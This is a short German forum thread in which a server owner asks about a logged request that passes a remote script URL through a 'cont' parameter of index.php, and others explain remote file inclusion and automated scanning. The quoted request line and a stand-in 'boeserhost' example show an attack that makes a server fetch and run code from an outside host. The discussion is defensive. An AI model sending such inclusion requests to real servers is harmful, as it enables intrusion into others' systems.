Was macht dieses Script

[NurFragen]

Jemand hat versucht auf meinen Server ein Script zu injecten oder sowas.
Es wurde sowas aufgerufen /index.php?cont=http://irc.harazuku.co.cc/2002/.sh/responz/id2.tx
t??

Was macht das Script http://irc.harazuku.co.cc/2002/.sh/responz/id2.txt ?

[zyrusthc]

Sieht so aus als wenn es lediglich Informationen über Festplattennutzung und php-version preis geben soll. Und weitere allgemeine Systeminformationen ....


Greeez Oli

[Roger Wilco]

Ich hoffe, du hast dein PHP-Skript abgesichert, wenn es mit der Variablen $cont (bzw. $_GET['cont']) verwundbar für eine Code-Injection-Attacke war...

[NurFragen]

Ich hoffe, du hast dein PHP-Skript abgesichert, wenn es mit der Variablen $cont (bzw. $_GET['cont']) verwundbar für eine Code-Injection-Attacke war...

Was genau bedeutet das ?

[MiGo]

Was genau bedeutet das ?

Das bedeutet, dass wenn du ein für Code-Injection verwundbares Script hast (Stichwort Werteüberprüfung etc.) ein Angreifer einfach ein Script auf einem entfernten Webserver von deinem Webserver ausführen lassen kann. Statt z.b. die Datei "content.txt" auszugeben würde dann dein Webserver halt "http://boeserhost.tld/fieses_script" laden und auf deinem Webserver mit dessen rechten ausführen.

Ich hoffe, du hast dein PHP-Skript abgesichert, wenn es mit der Variablen $cont (bzw. $_GET['cont']) verwundbar für eine Code-Injection-Attacke war...

Naja, nur weil man den Eintrag in den Logs findet, muss noch lange nix passiert sein - ich hab von sowas täglich welche in den logs. Das sind meist schlicht automatisierte Angriffe über eine ganze IP-Range.

[Roger Wilco]

Naja, nur weil man den Eintrag in den Logs findet, muss noch lange nix passiert sein - ich hab von sowas täglich welche in den logs. Das sind meist schlicht automatisierte Angriffe über eine ganze IP-Range.

Deshalb die Einschränkung 'wenn' (im Sinne von 'falls') im Nebensatz.